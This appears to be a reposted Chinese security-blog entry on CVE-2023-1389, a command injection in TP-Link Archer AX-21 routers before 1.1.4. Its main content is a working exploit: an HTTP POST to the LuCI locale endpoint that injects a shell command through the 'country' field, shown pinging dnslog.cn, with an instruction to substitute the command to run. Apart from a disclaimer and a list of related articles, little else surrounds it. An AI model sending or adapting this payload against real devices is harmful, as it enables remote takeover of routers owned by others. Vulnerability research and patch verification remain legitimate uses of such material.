CTF导航 CTF导航

TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389

IoT 2周前 admin
73 0 0

漏洞名称

TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389


漏洞复现

1、替换需要执行的命令

POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1Host: 1.1.1.1Content-Type: application/x-www-form-urlencoded
operation=write&country=$(`ping dnslog.cn`)

利用条件

TP-Link Archer AX-21 < 1.1.4

TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389

版权声明:admin 发表于 2024年4月21日 上午8:01。
转载请注明:TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389 | CTF导航

相关文章

Ruijie Switch PSG-5124 26293 – Remote Code Execution (RCE)
admin
70
FORTIGATE FIRMWARE ANALYSIS
admin
125
SaTC.一种全新的物联网设备漏洞自动化挖掘方法
admin
601
D-Link DAP-X1860: Remote Command Injection
admin
150
看我如何在靶场中配置路由反射器
admin
468
玩转Flipper Zero:iButton探索与操作指南
admin
18

相关文章

吴强等 ¦ “低慢小”无人机威胁分析
0
Dumping and extracting the SpaceX Starlink User Terminal firmware
0
中国烛龙S200 vs 以色列SMASH2000/3000 智能火控系统性能对比(附视频)
0
SSD ADVISORY – ZYXEL VPN SERIES PRE-AUTH REMOTE COMMAND EXECUTION
0
CVE-2024-20356: Jailbreaking a Cisco appliance to run DOOM
0
Hacking into colgate smart tooth brush for fun!
0
【BlackHat 2024】SystemUI As EvilPiP: 针对现代移动设备的劫持攻击
0
迅捷PoE*AC路由一体机FR100P-AC固件提取研究
0
路灯频率?自由控制路灯?
0
西湖论剑2024 IOT赛后复盘及mqtt rce详解
0